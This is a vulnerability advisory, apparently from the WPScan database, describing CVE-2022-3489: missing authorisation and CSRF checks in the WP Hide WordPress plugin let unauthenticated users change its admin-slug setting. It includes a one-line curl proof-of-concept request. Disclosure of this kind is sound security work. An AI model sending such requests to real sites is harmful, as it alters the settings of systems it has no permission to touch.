WordPress Plugin Vulnerabilities

WP Hide <= 0.0.2 - Unauthenticated Settings Update

Description

The plugin does not have authorisation and CSRF checks in place when updating the custom_wpadmin_slug settings, allowing unauthenticated attackers to update it with a crafted request

Proof of Concept

curl -X POST --data "custom_wpadmin_slug=attacker-value" https://example.com/wp-admin/admin-post.php

Settings is displayed in Settings > Permalinks

Affects Plugins

wp-hide

No known fix - plugin closed

References

CVE

CVE-2022-3489

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CWE-862

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

36d78b6c-0da5-44f8-b7b3-eae78edac505

Timeline

Publicly Published

2022-10-17 (about 3 months ago)

Added

2022-10-17 (about 3 months ago)

Last Updated

2022-10-17 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin